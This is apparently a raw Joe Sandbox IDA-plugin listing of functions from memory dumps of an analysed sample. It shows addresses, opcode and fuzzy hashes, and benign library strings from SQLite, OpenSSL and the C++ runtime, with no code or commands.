                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2803948771
                                                                                                                                                                                                                                                                    • Opcode ID: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                                    • Instruction ID: f5d2f77db95db668f27711f45de61909337c8d3ecbf45f059163e5835fe32f8e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491ACE1F0820285FB689B25D458BBA67A4EF88B98F044135DE9D073D2EF3DE945C748
                                                                                                                                                                                                                                                                    Function 00007FFB0C06CE50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-515162456
                                                                                                                                                                                                                                                                    • Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                    • Instruction ID: cb625a1a1f8c92a0478605f4c5311d3e6dbd6e297b5e2375859669110e52d6bf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D819AF2B08752C9EA619F21E448BB977A5FF44B84F598036EA8C47284EF38E541C308
                                                                                                                                                                                                                                                                    Function 00007FFB0C08A8B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2451720372
                                                                                                                                                                                                                                                                    • Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                                    • Instruction ID: 9c4ab41a8ac97f708fdc05809a0dddab3ad7bedafa8b1d5f7d58ee07ec387506
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E37192E2B08A4181EF159F31C1487B96390EF54BA4F499232DEAD07AC5EF3CE599D348
                                                                                                                                                                                                                                                                    Function 00007FFB0C0899C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: index '%q'
                                                                                                                                                                                                                                                                    • API String ID: 0-1628151297
                                                                                                                                                                                                                                                                    • Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                                    • Instruction ID: 825d9b42d3e157fca775d442539225e35715b81431ba8142decb4ec58d3dc5b4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8971D2F2B1865189EB10AB75D844ABC3BB0BF44B98F008635DE6E57BD4EF389445C748
                                                                                                                                                                                                                                                                    Function 00007FFB0C024A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %02d
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-896308400
                                                                                                                                                                                                                                                                    • Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                                    • Instruction ID: dc9e73f1a3e1f31b20701e14472610c8612807b741ff4d3028790c18e97cc66a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60719EF2A1869285EB268F64E848BFD7764FF84748F504135EE8E13A59EF38E445CB04
                                                                                                                                                                                                                                                                    Function 00007FFB0C0BD690 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFB0C0BD93A,?,?,?,00007FFB0C0BDCFB), ref: 00007FFB0C0BD8A7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: CRE$INS
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-4116259516
                                                                                                                                                                                                                                                                    • Opcode ID: 822c72113fbf7660647f9a9edbd070d2d2960cc045afc80f290bda24906f9860
                                                                                                                                                                                                                                                                    • Instruction ID: dcc16ac7976ce004a085a7c9244043011cb4babd44569ffc9338a69572431056
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 822c72113fbf7660647f9a9edbd070d2d2960cc045afc80f290bda24906f9860
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B519AE5B09B4281EA65DB36D418AB9A3A2AF80FC4F584135DE4D47799FF3DE801C348
                                                                                                                                                                                                                                                                    Function 00007FFB1AB036A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007B6570
                                                                                                                                                                                                                                                                    • String ID: _constructors$openssl_
                                                                                                                                                                                                                                                                    • API String ID: 4069847057-3359357282
                                                                                                                                                                                                                                                                    • Opcode ID: a7dc1b67828781beb12e741df7f46f6710b7391403279fd1f2b800e1e5e5bbcd
                                                                                                                                                                                                                                                                    • Instruction ID: 0ebe9f7ff80ef87cd1dbc7ef6a8a754e7d44f681c8178c42b666fa09c91a1f2b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7dc1b67828781beb12e741df7f46f6710b7391403279fd1f2b800e1e5e5bbcd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD4142B990AF8381EA354B35D69867B66BABF49FA1F4440B6CD0E22755DF3CF4818301
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A6FE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C058
                                                                                                                                                                                                                                                                    • String ID: COMMIT$query string is too large
                                                                                                                                                                                                                                                                    • API String ID: 3574868227-2709575789
                                                                                                                                                                                                                                                                    • Opcode ID: 21e30348c05b67ee3b521cb81aeeaba2193d85109b63ecd2b393586fcd8e0965
                                                                                                                                                                                                                                                                    • Instruction ID: aeceaf2d4ab548e228cf6e2177d345211d4af241dd0c2a9ce514dfbddd772fb9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21e30348c05b67ee3b521cb81aeeaba2193d85109b63ecd2b393586fcd8e0965
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A418EF6A08B4286EB108B76E808A6963A1FF85FE4F180571DE5E477A4DF3DE4438700
                                                                                                                                                                                                                                                                    Function 00007FFB0C029880 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2766056989
                                                                                                                                                                                                                                                                    • Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                    • Instruction ID: 857eee4f6457588a7658945925d7e584ba386dc7e0fdf8941cbf6b435cef3a0e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9418CE1D0C68386F6569F35E88C9756791BF44790F66413AE86D032A1EF3CB488C688
                                                                                                                                                                                                                                                                    Function 00007FFB1AB05F58 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007A4124
                                                                                                                                                                                                                                                                    • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                                                    • API String ID: 1647237834-4266787399
                                                                                                                                                                                                                                                                    • Opcode ID: 83e2ac935dfbc44169b5b9482cf9ac7e30b64d6e74f5cd2553697f6cfdf18808
                                                                                                                                                                                                                                                                    • Instruction ID: c714e9c6e9a47bb302dd38a319f34bbcdfd836bf2849d071a72ab4909cce7032
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83e2ac935dfbc44169b5b9482cf9ac7e30b64d6e74f5cd2553697f6cfdf18808
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 223132A5A08FC186E620CB31E59437AA37AFB99BA4F104276D94D53B54EF7CF045C700
                                                                                                                                                                                                                                                                    Function 00007FFB1C258DB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: void$void
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                                    • Opcode ID: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                                                                                    • Instruction ID: e4d0ed312992019cd5c2c33c2d6ec1ad455b5a40ed05f57062f9202d4e2e9e05
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D13168E2F18F659AFB00ABB0D8480FD33B1BB49758B640136EE4E56B58DF789544C790
                                                                                                                                                                                                                                                                    Function 00007FFB1BB19F90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                                                    • String ID: Q2"e
                                                                                                                                                                                                                                                                    • API String ID: 3936158736-2497648249
                                                                                                                                                                                                                                                                    • Opcode ID: 9c639d95daf90bba28fa37fb080816b33e3113327c7d8cd4b5b1572e04a0cf6c
                                                                                                                                                                                                                                                                    • Instruction ID: 84d69d2db04a35a2d0b7c658dbf24f3af797b3b69b1da64d06e6e8e763d4d608
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c639d95daf90bba28fa37fb080816b33e3113327c7d8cd4b5b1572e04a0cf6c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D2129BCA08F4295EB248B25F85136673A6FB843A4F50A0B5D98D42BB4DF3CF406C700
                                                                                                                                                                                                                                                                    Function 00007FFB1C254E2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                                                                                                                    • API String ID: 3685223789-3176238549
                                                                                                                                                                                                                                                                    • Opcode ID: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                                                                                    • Instruction ID: 0373725b725ce6c42797ff4204ceb8a5a102a0d2b35bf1a31e84c8b9783a7bf8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 370175E1B29E4693EE40EB34E4481F96362FF91B64FA09031D94E07765EF6CE905C790
                                                                                                                                                                                                                                                                    Function 00007FFB1C2551D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
